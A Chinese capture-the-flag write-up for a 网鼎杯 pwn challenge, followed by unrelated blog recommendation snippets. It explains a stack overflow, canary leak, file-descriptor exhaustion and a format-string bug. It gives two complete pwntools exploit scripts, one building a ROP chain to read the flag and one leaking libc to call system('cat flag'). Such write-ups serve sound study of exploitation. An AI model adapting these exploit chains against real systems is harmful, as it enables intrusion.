网鼎杯(4)-pwn

题目链接

保护

保护还挺多

main函数
bored函数
fmt函数
secret函数
stack函数

主要漏洞点:

  • stack函数有栈溢出,还有puts函数可以泄漏栈的东西
  • secret函数由于每个用户能打开的文件数是一定的,函数没有fclose ,一直开 最后读进去的就是空的,所以可以绕过memcmp函数去执行qmemcpy函数达到栈溢出
读写函数细节

类似的题有pwnable.kr的otp (后面做到的时候可以再回顾一下)

  • fmt函数有2字节的格式化字符串漏洞
  • bored函数可以控制secret栈溢出时的payload,带有一个递归功能

利用方式:
1.利用bored函数递归几次改变栈结构再利用stack函数泄漏出canary,然后利用bored和secret函数来rop : open('./flag',0) --> read(0,bss,0x200) --> puts(bss)

2.利用bored函数递归几次改变栈结构再利用stack函数泄漏出canary,再用fmt函数泄漏libc得到system地址,然后利用bored和secret函数栈溢出执行 : system('cat flag')

exp1:

from pwn import *
#context.log_level = 'debug'


p = process('./pwn.')
elf = ELF('./pwn.')

def stack(payload):
    p.sendlineafter('option:','1')
    p.sendafter('once..\n',payload)

def secret(payload):
    p.sendlineafter('option:','9011')
    p.sendafter('code:',payload)

def fsb(payload):
    p.sendlineafter('option:','3')
    p.sendafter('think?)\n',payload)

def bored(payload,choice = 'n'):
    p.sendafter('bored...\n',payload)
    p.sendafter('y/n\n',choice)


#leak canary
p.sendlineafter('option:','2')
for i in range(4):
    bored('a')
bored('a','y')


stack('a'*0xa8 + 'a')
p.recv(0xa9)
canary = u64(p.recv(7).rjust(8,'\x00'))
log.success('canary : 0x%x' %canary)

#open('./flag',0) --> read(0,0x602068,0x200) --> puts(0x602068)
'''
open函数返回的文件描述符fd一定是未使用的最小的文件描述符。
#利用这个特性,可以改变0,1,2这三个文件描述符所指向的文件,由于进程默认会打开0,1,2这三个文件描述符,而且指向了键盘和显示器的设备文件。
如果在open之前先进行close(0),然后再调用open函数就会返回最小的未使用的fd,也就是0。
如果没有就是3
'''
open_plt = elf.plt['open']
read_plt = elf.plt['read']
puts_plt = elf.plt['puts']
pop_rdi = 0x0000000000400c53
pop_rsi_r15 = 0x0000000000400c51

payload = './flag\0\0' + p64(canary) + 'a'*0x8
payload += p64(pop_rdi) + p64(0x602080) + p64(pop_rsi_r15) + p64(0) + p64(0)
payload += p64(open_plt) + p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(0x602068) + p64(0)
payload += p64(read_plt) + p64(pop_rdi) + p64(0x602068) + p64(puts_plt) 

p.sendlineafter('option:','2')
bored(payload,'y')
#gdb.attach(p)
try:
    for i in range(9999):
        secret('\0')

except Exception as e:
    p.close()


p.interactive()

exp2:

from pwn import *
#context.log_level = 'debug'


p = process('./pwn.')
elf = ELF('./pwn.')

def stack(payload):
    p.sendlineafter('option:','1')
    p.sendafter('once..\n',payload)

def secret(payload):
    p.sendlineafter('option:','9011')
    p.sendafter('code:',payload)

def fsb(payload):
    p.sendlineafter('option:','3')
    p.sendafter('think?)\n',payload)

def bored(payload,choice = 'n'):
    p.sendafter('bored...\n',payload)
    p.sendafter('y/n\n',choice)


#leak canary
p.sendlineafter('option:','2')
for i in range(4):
    bored('a')
bored('a','y')

stack('a'*0xa8 + 'a')
p.recv(0xa9)
canary = u64(p.recv(7).rjust(8,'\x00'))
log.success('canary : 0x%x' %canary)

offset_system = 0x0000000000045390
offset_str_bin_sh = 0x18cd57
offset_onegadge = 0xf1147
pop_rdi = 0x0000000000400c53


#leak libc
fsb('%a')
p.recvuntil('0x0.0')
libc_base = int(p.recvuntil('p-',drop = True),16) - 0x3c56a3
log.success('libc base addr : 0x%x' %libc_base)
system_addr = libc_base + offset_system
binsh_addr = libc_base + offset_str_bin_sh
log.success('system addr : 0x%x' %system_addr)
log.success('binsh addr : 0x%x' %binsh_addr)


#cat flag
payload = 'cat flag' + p64(canary) + 'a'*0x8
payload += p64(pop_rdi) + p64(0x602080) + p64(system_addr)

p.sendlineafter('option:','2')
bored(payload,'y')

#gdb.attach(p)
try:
    for i in range(9999):
        secret('\0')

except Exception as e:
    p.close()


p.interactive()

这里用

find .|xargs grep -ri 'define O_RDONLY'  #去看了下open函数的参数flags的意思
------------------------------------------------------
/* File access modes for `open' and `fcntl'.  */
#define O_RDONLY        0       /* Open read-only.  */
#define O_WRONLY        1       /* Open write-only.  */
#define O_RDWR          2       /* Open read/write.  */
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 151,688评论 1 330
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 64,559评论 1 273
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 101,749评论 0 226
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 42,581评论 0 191
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 50,741评论 3 271
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 39,684评论 1 192
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,122评论 2 292
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 29,847评论 0 182
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 33,441评论 0 228
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 29,939评论 2 232
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 31,333评论 1 242
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 27,783评论 2 236
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 32,275评论 3 220
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 25,830评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,444评论 0 180
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 34,553评论 2 249
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 34,618评论 2 249

推荐阅读更多精彩内容

  • C语言中内存分配 在任何程序设计环境及语言中,内存管理都十分重要。在目前的计算机系统或嵌入式系统中,内存资源仍然是...
    一生信仰阅读 1,066评论 0 2
  • 网鼎杯第一场wp guess防护机制:image.png 开启了canary和NX 简单的看了下反编译的逻辑 发现...
    zs0zrc阅读 1,894评论 0 4
  • 类也是对象 在Python中一切都是对象,类也不例外。所以可以对类进行以下操作。1.可以当做参数传递2.可以添加属...
    FangHao阅读 394评论 0 0
  • 清明细雨三两日 晨起祭拜泪潸然 思君念君忆忠烈 林间百鸟破长空
    玄女涅槃y杨门第九代阅读 97评论 0 0
  • 山生平川上,各披一身苍。 围坐清江前,爭相近顾盼。 如佛静坐𥧌,似龟翘首望, 忽来数船人,相见意欲狂!
    平天下之文世界阅读 262评论 0 4